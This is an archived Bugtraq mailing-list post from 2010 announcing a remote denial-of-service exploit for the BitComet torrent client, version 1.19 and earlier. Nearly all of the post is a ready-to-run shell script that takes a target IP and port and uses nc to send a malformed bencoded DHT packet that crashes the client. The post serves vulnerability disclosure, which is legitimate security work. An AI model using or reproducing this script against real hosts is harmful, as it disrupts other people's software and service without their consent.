lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 31 Mar 2010 14:12:53 +0200
From: Pierre Noguès <pierre@...ahax.com>
To: bugtraq@...urityfocus.com, secalert@...urityreason.com,
	vuln@...unia.com, submissions@...ketstormsecurity.org,
	submit@...sec.com
Subject: BitComet <= 1.19 Remote DOS Exploit

#!/bin/sh
#
# BitComet <= 1.19 Remote DOS Exploit
# Pierre Nogues - http://www.indahax.com/
#
# Description:
#     BitComet is a torrent client
#
#     BitComet doesn't handle malicious DHT packet with an invalid bencoded message.
#
# Affected versions :
#     BitComet <= 1.19
#
# Plateforms :
#     Windows
#
# Usage :
#     ./exploit.sh ip port

if [ $# -ne 2 ]; then
     echo "./exploit.sh ip port"
     exit 1
fi

nc -u $1 $2 << .
d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee
.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ